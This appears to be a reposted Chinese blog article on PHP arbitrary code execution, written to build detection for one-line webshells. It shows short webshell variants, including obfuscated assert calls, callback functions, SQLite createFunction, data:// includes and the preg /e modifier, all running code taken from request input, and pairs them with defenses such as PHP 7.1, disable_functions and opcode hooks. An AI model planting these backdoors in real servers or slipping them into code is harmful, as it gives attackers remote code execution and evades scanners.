php ssert,从PHP源码与扩展开发谈PHP任意代码执行与防御

PHP的灵活性极强，其可以通过各种意想不到的办法来动态执行代码。正因如此，PHP界的“一句话木马”(“后门”，backdoor)，写法极其神奇，充满了脑洞，大部分变种完全无法通过静态扫描查到(当然如果用沙盒执行+启发式拦截的方式大概可以，这就变成传统杀毒软件了)。因此，我们不如从这些一句话木马，看看PHP是如何执行动态代码的吧。

先说明，如果只是要在自己服务器上防御的话，可以只看下面几行后关闭这篇文章：

升级到PHP 7.1，该版本对大部分常见的执行动态代码的方法进行了封堵。

php.ini中，关闭“allow_url_fopen”。在打开它的情况下，可以通过 phar:// 等协议丢给include，让其执行动态代码。

php.ini中，通过disable_functions关闭 exec,passthru,shell_exec,system 等函数，禁止PHP调用外部程序。

永远不要在代码中使用eval。

设置好上传文件夹的权限，禁止从该文件夹执行代码。

include 文件的时候，注意文件的来源；需要动态include时做好参数过滤。

当然，本文未经特别标注，全部以PHP 7.1为基础。

先从最简单的一句话木马开始吧：

PHP

这种代码因为用了eval，所以是最好封堵或查杀的。eval不可通过disable_functions关闭，也不可以通过字符串来调用。它是一个语言特性，而不是一个函数。用关键字扫描即可解决。

PHP不是解释执行的(即读一行执行一行)。在代码执行前，先要由Zend引擎将其编译为一种中间语言，称之为“OPCode”。我们通过vld扩展(github.com/derickr/vld)，可以在代码执行前看到这一段PHP到底被解析成了什么。

Markdown

line #* E I O op fetch ext return operands

————————————————————————————-

1 0 E > INCLUDE_OR_EVAL ‘1’, EVAL

2 1 > RETURN 1

可以看到的是，这个opcode是“INCLUDE_OR_EVAL”。看看什么东西会被组合成这个opcode：github.com/php-src/php…

case ZEND_AST_INCLUDE_OR_EVAL:

switch (ast->attr) {

case ZEND_INCLUDE_ONCE: FUNC_OP(“include_once”);

case ZEND_INCLUDE: FUNC_OP(“include”);

case ZEND_REQUIRE_ONCE: FUNC_OP(“require_once”);

case ZEND_REQUIRE: FUNC_OP(“require”);

case ZEND_EVAL: FUNC_OP(“eval”);

EMPTY_SWITCH_DEFAULT_CASE();

}

break;

于是，自然而然地得知了，include / require和eval的效果都一样。于是引申出了以下做法：

PHP

file_put_contents(‘1.php’, ‘<?php echo “a”;’);

include_once ‘1.php’;

显而易见，这种就显得极难查杀了；如果我们监控了文本文件写，那我们还有许多方式来绕过检测。比如说通过SQLite：

PHP

$db = new SQLite3(‘db.db’);

$db->exec(‘CREATE TABLE a(b STRING)’);

$db->exec(‘INSERT INTO a(b) VALUES (“<?php ‘ . $_GET[‘a’] . ‘”)’);

$db->close();

include ‘db.db’;

这里的防御就显得极为复杂了，因为考虑到现在世界上绝大多数的CMS / 框架的模板都是生成PHP后include的，很难确定保存的文件哪些是用户输入的代码，哪些又不是。

也许，我们可以通过检测用户输入来下手？联想到生物“同位素示踪法”，试试看给用户的输入都打个Tag。不过这不能通过外部Hook执行了，到这里，必须从PHP的扩展下手。

在PHP_RINIT_FUNCTION挂一下，每次访问一个PHP页面的时候，都会执行这个函数。然后从PG(http_globals)[TRACK_VARS_POST]这个数组拿输入数据，就可以拿到用户输入的zval了。

zval是PHP中的数据类型的基本结构，通过Z_STR_P这个宏可以将其转为zend_string。不过zend_string目前和我们没啥关系，不关注它。通过看zval的结构，我们发现可以把flag写在zval里面，正如taint这个扩展所做的一样，直接往zval.u.v.flags里丢东西就好啦。

taint的代码：

/* {

{

{ PHP_RINIT_FUNCTION

PHP_RINIT_FUNCTION(taint)

{

if (SG(sapi_started) || !TAINT_G(enable)) {

return SUCCESS;

}

if (Z_TYPE(PG(http_globals)[TRACK_VARS_POST]) == IS_ARRAY) {

php_taint_mark_strings(Z_ARRVAL(PG(http_globals)[TRACK_VARS_POST]));

}

if (Z_TYPE(PG(http_globals)[TRACK_VARS_GET]) == IS_ARRAY) {

php_taint_mark_strings(Z_ARRVAL(PG(http_globals)[TRACK_VARS_GET]));

}

if (Z_TYPE(PG(http_globals)[TRACK_VARS_COOKIE]) == IS_ARRAY) {

php_taint_mark_strings(Z_ARRVAL(PG(http_globals)[TRACK_VARS_COOKIE]));

}

/* 这里我认为SERVER下的HTTP头也要做个拦截 */

return SUCCESS;

}

/** php_taint_mark_strings的主要内容是 **/

#define TAINT_MARK(str) (GC_FLAGS((str)) |= IS_STR_TAINT_POSSIBLE)

TAINT_MARK(Z_STR_P(val));

不过问题来了——

每个PHP_FUNCTION返回的zval都是全新生成的，新的zval是不继承之前的flag的。这就代表我们必须重写所有的函数……所以无法通过检测用户输入来下手……

那，这里最好的方案也就只有白名单了。这个也不太适合通过外部ptrace等监控PHP的fopen系统调用来实现，还是需要通过扩展。不过目前没有扩展能实现这个白名单机制，我之后会在我的扩展内实现。

但如果关闭了PHP的文件读写，还可以继续执行吗？我们可以追一下代码，很容易就追到了php_resolve_path：github.com/php-src/php…。于是我们发现我们可以include各种协议，比如说：

PHP

include(“data://text/plain;base64,”.base64_encode($content));

甚至，如果打开phar扩展的话，因为zend_resolve_path函数指针被指去了phar_resolve_path，我们还可以通过构造一个phar来动态执行代码。

这就显得很尴尬了，应该怎么防御呢？在php.ini中，关闭“allow_url_fopen”即可解决。

另外，还有一个通过MySQL来写文件，然后由PHP来include的神奇方案。仅作记录。

使用

SQL

SELECT * INTO OUTFILE

这个SQL语句可以把MySQL查询写到文件里面。在PHP 5.2下，不受open_basedir的限制，可以随便写到任何一个有权限的地方。

暂未确定这个文件是由MySQL写入的还是PHP写入的(因为懒得查)，我个人怀疑还是通过PHP进程写入的，因为open_basedir这个php.ini的配置可以神奇地影响到SQL查询。PHP 5.3以及以后版本，其默认mysql驱动为mysqlnd；PHP 5.2为libmysql。使用libmysql的版本不受open_basedir的限制，所以我猜测从外部监控PHP的系统调用就可以查得到。

那我们还可以不通过eval来执行代码嘛，比如说，create_function。

PHP

$a = ‘phpinfo();’;

call_user_func(create_function(null, $a));

切到Opcode里：

Markdown

line #* E I O op fetch ext return operands

————————————————————————————-

1 0 E > ECHO ‘a’

2 1 ASSIGN !0, ‘phpinfo();’

3 2 INIT_FCALL ‘create_function’

3 SEND_VAL null

4 SEND_VAR !0

5 DO_ICALL $2

6 INIT_USER_CALL 0 ‘call_user_func’, $2

7 DO_FCALL 0

4 8 > RETURN 1

嗯，解决方式是干掉create_function这个函数。这个函数因为特征比较明显(谁没事会从字符串创建函数？)了，所以用的人少一些；assert这一些函数隐蔽的多(断言很常见)。

如：

PHP

assert(‘a’);

会生成

PHP

line #* E I O op fetch ext return operands

————————————————————————————-

2 0 E > ASSERT_CHECK

1 INIT_FCALL ‘assert’

2 SEND_VAL ‘a’

3 DO_ICALL

4 > RETURN 1

它的opcode调用是INIT_FCALL，说明这是一个函数。这也就是说，我们可以通过各种方式对其进行隐藏：

PHP

$p = ‘a’ . ssert’;

$p(‘phpinfo()’);

转到Opcode，就变成

PHP

line #* E I O op fetch ext return operands

————————————————————————————-

2 0 E > ASSIGN !0, ‘assert’

3 1 INIT_DYNAMIC_CALL !0

2 SEND_VAL_EX ‘phpinfo%28%29’

3 DO_FCALL 0

4 > RETURN 1

还有以下各种变种：

PHP

array_map(assign, $_POST);

register_shutdown_function(‘assert’, $_POST[‘code’]);

filter_var($_REQUEST[‘code’], FILTER_CALLBACK, [‘options’ => ‘assert’]);

filter_var_array([‘test’ => $_REQUEST[‘code’]], [‘test’ => [‘filter’ => FILTER_CALLBACK, ‘options’ => ‘assert’]]);

甚至还可以：

PHP

$db = new SQLite3(‘db.db’);

$db->createFunction(‘f’, ‘assert’);

$stmt = $db->prepare(“SELECT f(?)”);

$stmt->bindValue(1, $_POST[‘code’], SQLITE3_TEXT);

$stmt->execute();

这种方式应该怎么防御呢？就有好几种办法了。

办法一，升级到PHP 7.1即可解决。PHP 7.1“Forbid dynamic calls to scope introspection functions”(php.net/manual/en/m…)，禁止了所有这种函数的调用。

办法二：

不用PHP 7.1的话还是得写扩展，在老版本PHP上实现新版本的功能。

首先，Hook住以下四个Opcode：ZEND_DO_FCALL ZEND_DO_ICALL ZEND_DO_UCALL ZEND_DO_FCALL_BY_NAME，检测一下调用了什么函数(zend_string_equals_literal(fbc->common.function_name, “print_r”))。所有的动态调用最后都会跑到INIT_DYNAMIC_CALL来，在zend_init_dynamic_call_xxxx里会给它打一个ZEND_CALL_DYNAMIC的flag。所以，当涉及到特殊函数时，就检测一下现在的current_execute_data是不是动态调用的即可。

按照PHP 7.1的逻辑，需要检测：

assert() – with a string as the first argument

compact()

extract()

func_get_args()

func_get_arg()

func_num_args()

get_defined_vars()

mb_parse_str() – with one arg

parse_str() – with one arg

不过这还不够，实际上还有更猥琐的。

PHP 5.4和以下版本的PCRE，支持“//e”这种修饰符来修饰正则，即“PREG_REPLACE_EVAL”

PHP

preg_match(‘/.*/e’, $_POST[‘code’], ‘fuck’);

怎么防御？

办法一，升级到PHP 7。

办法二，Hook住preg_replace、preg_filter函数。只有这两个函数调用了preg_replace_impl，才会用到PREG_REPLACE_EVAL。当然，对于老版本PHP，还需要Hook住ereg_、mb_preg系列函数。

文末最后说一下，因为某些需求(不会部署在自己的服务器上)，我需要一套一句话木马检测方案，所以写出了本文以及半成品扩展：github.com/zsxsoft/fva… 。

参考：

你可能也喜欢